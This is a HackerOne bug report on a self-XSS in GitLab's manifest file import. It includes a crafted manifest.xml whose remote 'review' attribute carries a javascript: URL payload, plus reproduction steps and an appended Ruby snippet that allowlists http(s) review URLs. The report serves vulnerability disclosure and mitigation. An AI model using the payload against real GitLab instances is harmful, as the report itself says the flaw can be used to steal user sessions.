Self-XSS in GitLab manifest file import
HackerOne report #1036636 by shells3c on 2020-11-17, assigned to @dcouture:
Report
Description
XSS in the GitLab manifest Import page.
Steps to reproduce
manifest.xml
<manifest>
<remote review="javascript://HelloTheGitlabSecurityTeam<3%0Aprompt(1)%0A" />
<project path="test1" name="manifest1" />
<project path="test2" name="manifest2" />
<project path="test3" name="manifest3" />
<project path="test4" name="manifest4" />
<project path="test5" name="manifest5" />
<project path="test6" name="manifest6" />
</manifest>
- Choose that file to import, then click "List available repositories"
- On the Import page, click on the link to trigger the XSS
Impact
Self-XSS, used to steal the user session in self-hosted GitLab instances.
How To Reproduce
Please add reproducibility information to this section:
- New project
- Import from a manifest
- Use this manifest #284676 (comment 450121622)
Edited by Dominic Couture
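
An added example, not code from the report or from GitLab: one way to keep a manifest's `review` value out of a rendered link unless it is an absolute http(s) URL, failing closed on anything that does not parse. The helper names and the `gerrit.example.com` URL are assumptions made for illustration.

```ruby
require 'rexml/document'
require 'uri'

# Only these schemes may end up in an href built from a manifest remote.
ALLOWED_SCHEMES = %w[http https].freeze

# Hypothetical helper: true only for an absolute http(s) URL with a host.
# An allowlist is used because a value such as "javascript://..." still
# looks like a URL with an authority part.
def safe_review_url?(value)
  uri = URI.parse(value.to_s.strip)
  ALLOWED_SCHEMES.include?(uri.scheme&.downcase) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false # unparseable input is rejected, never passed through
end

# Hypothetical helper: returns the remote's review URL, or nil when the
# manifest cannot be parsed or the URL is not allowed (fail closed).
# A raw "<" inside an attribute is not well-formed XML, so a strict parser
# may reject the reported file outright; a lenient parser will not, which
# is why the scheme check is still required.
def review_base(manifest_xml)
  doc = REXML::Document.new(manifest_xml)
  remote = REXML::XPath.first(doc, '/manifest/remote')
  review = remote && remote.attributes['review']
  safe_review_url?(review) ? review : nil
rescue StandardError
  nil
end

# Constructed samples: the report's manifest (shortened) and a benign one.
REPORTED = <<~XML
  <manifest>
    <remote review="javascript://HelloTheGitlabSecurityTeam<3%0Aprompt(1)%0A" />
    <project path="test1" name="manifest1" />
  </manifest>
XML

BENIGN = <<~XML
  <manifest>
    <remote review="https://gerrit.example.com/" />
    <project path="test1" name="manifest1" />
  </manifest>
XML

if __FILE__ == $PROGRAM_NAME
  puts "reported: #{review_base(REPORTED).inspect}"
  puts "benign:   #{review_base(BENIGN).inspect}"
end
```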